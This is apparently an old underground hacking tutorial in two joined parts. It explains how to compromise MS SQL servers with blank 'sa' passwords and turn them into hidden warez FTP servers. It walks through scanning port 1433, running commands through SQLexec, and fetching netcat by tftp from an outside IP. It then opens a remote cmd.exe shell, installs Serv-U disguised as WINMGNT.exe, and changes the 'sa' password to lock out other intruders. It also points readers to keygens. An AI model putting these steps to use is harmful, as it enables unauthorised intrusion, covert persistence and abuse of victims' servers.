[SQL] hacking Tips for advanced users

To understand this tutorial you have to:

1-Be familiar with the concept of exploiting an SQL server using the ECHO comman
d..if you don't know how to do it well then forget about it.
2-have knowleadge about the basic commands of MSDOS and BATCH files.
(3-Having a good knowleadge about MSSQL server functions also helps a lot.)
FIRST TIP - MAKING YOUR SERVER SAFE BY CHANGING DEFAULT "SA" PASSWORD
This is something quite easy and avoids further concerns about seeing your fast
stro getting rehacked.
1-Connect to the SQL server using SQLEXEC (once again i remember you gotta know
how to exploit an SQL by yourself..i'm not gonna teach you that).
2-Use the ECHO command to create a file with any name..the extension has to be .
BAT with the following lines:
@osql -U sa -P -Q "sp_password NULL , newpassword , sa"
@exit
*syntax:
- OSQL: is a program used to execute certain operations on a database..don't kno
w how "powerful" it is because i don't know much about SQL servers. (For more in
fo just type "OSQL" on SQLEXEC).
- -U sa: -U stands for USERNAME, SA is obviously the username you're using to co
nnect to the current database
- -P : -P stands for password and the ' ' (blank space) is the current NULL pass
word for the SA account.
- -Q "sp_password NULL , safestro , sa": with this you are executing a function
on the database that allows you to control users on the database. NULL is the ac
tual password (don't leave a blank space..type just NULL) , newpassword is the p
assword you want to use..it can be anything with more than 6 characters, avoid s
tarting the password with numbers. eg. BAD: 2002imadethis GOOD: imadethis2002. s
a is the user you are changing the password.
- exit: will close the window as soon as the operation finishes.
2-After having that file created on the server execute it by typing, on SQLEXEC,
the command C:\PATH\FILENAME.BAT. If everything went fine the output will be Pa
ssword changed. and now the password for the SA account is the one you chose. An
d there you go, it's safe against rehackers but not agains the admin..have that
in mind
-----------------------------------------
SECOND TIP - MAKING SERV-U START AS A DEFAULT SYSTEM SERVICE
This is what i'll keep your from having to log in and restart the Serv-U daemon
everytime the system restarts
I've read the Serv-U help files and some of the commands here ONLY work on windo
ws NT and Windows 2000 and also Serv-U 3 or Higher. i've not tested them on wind
ows XP. this will NOT work on win95/98/ME. i haven't tested it on serv-u 2.5 or
older so do it on your own.
1-Upload the needed files, Servudaemon.exe (you can rename this file to whatever
you want) and Servudaemon.ini. (as you are an experienced SQL hacker you alread
y know how to do this ) ATT: DON'T execute the Servudaemon.exe file yet or else
it won't work right
2-type this command on SQLEXEC: C:\PATH\OF\FILES\Servudaemon.exe /i. the serv-u
documentation identifies the "/i" as "install server as a system service (NT onl
y)". basically what it does is to had group of registry keys to the windows regi
sty so that it will start everytime the system restarts. There will be no fixed
output to this command so wait a couple of seconds and it's done.
3-Now type the following command on SQLEXEC: NET START Serv-U and if everything
went as predicted the output will be The Serv-U FTP Server service was started s
uccessfully. and it's all done. NOW Serv-U is up and running and you don't have
to worry about restarts.
*Sometimes the output of the NET START Serv-U can be The requested service has a
lready been started.. this has two meanings. One: it's your server and you alrea
dy started it. Two: it's already hacked and now what i'm gonna explain do it on
your own..you SHOULD RESPECT others "work" though.
3.1-Type the command NET STOP Serv-U and the output will be The Serv-U FTP Serve
r service was stopped successfully.. and you're done. the server is down so now
go back and execute what i described on step 2 and step 3 to execute your own se
rv-u there.
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
___________________________________________________________________
[SQL] Hacking tut........
WARNING: This document/tutorial is to be kept private!
**** Creating a pubstro using mssql bugs v1.1****
I created this tutorial assuming you have the following skills:
- Download/unzip/install files
- Know Windows/dos commands
- Know how to scan ranges for a certain port.
- Know how to register a program with a keygen
- Know how to setup an ftp server using serv-u
1. Scan your favorite range with your favorite scanner on port 1433 (I recommend
Superscanner)
In my progs pack OR @ http://packetstormsecurity.nl/NT/scanners/superscan.exe
Save the results
2. Install Serv-u Ftp server (www.serv-u.com)
\ul In my progs pack OR @ Get the keygen @ http://astalavista.box.sk and registe
r it
Add some users the way you like your pubstro to be also change the settings and
shit
3. On a machine (your own maybe?) start an TFTP server (spelled correctly)
On most linux boxes there is a tftp server already
(try to figure out how to set it up correctly)
If you have the server running copy the two files from serv-u (WINMGNT.exe and s
ervudaemon.ini)
to the tftp server dir.
Download netcat.
In my progs pack OR @ http://www.atstake.com/research/tools/nc11nt.zip
- extract the nc.exe and copy it to your tftp server dir
Download SQLexec with the graphical user interface
In my progs pack OR @ http://www.peckerland.com/software/sqlexec.zip
Unzip sqlexec.zip and start the sqlexec.exe
- in the host field, fill in some ip that has port 1433 open.
- Press connect
- if the connect button disables you have a vulnerable server else it will say "
Unable to connect" then you have to do the same with another ip until it is conn
ected
- if connected : go to the CMD field
- enter: tftp -i 128.233.42.47 get nc.exe
- The client will probably freeze but hell it works..
- start another instance of sqlexec
- reconnect as before..
- enter: nc.exe -L -p 1111 -d -e cmd.exe
now use telnet RTC or putty or something else...
Start->Run ---> telnet IP_FROM_SERVER 1111
you will now see the windows command line
that's easier to work with than sqlexec alone.
Now enter the following commands:
Type "dir" enter (5x !!)
Now you will get a dir listing and you are sure it works
then:
tftp -i 128.233.42.47 get servudaemon.ini
tftp -i 128.233.42.47 get WINMGNT.exe
-- go back to sql exec.
Reconnect..
CMD to execute : WINMGNT.exe (hidden)
the ftp should be working now if you made the right directory structure!!
Good luck! ( remake by FDF "the key to your succes" )
IN VERSION 1.2
- Full with SCREENSHOTS
- All programs INCLUDED!
- Other ways how to do it!
And remember to keep it secret m8!s this is only for 1337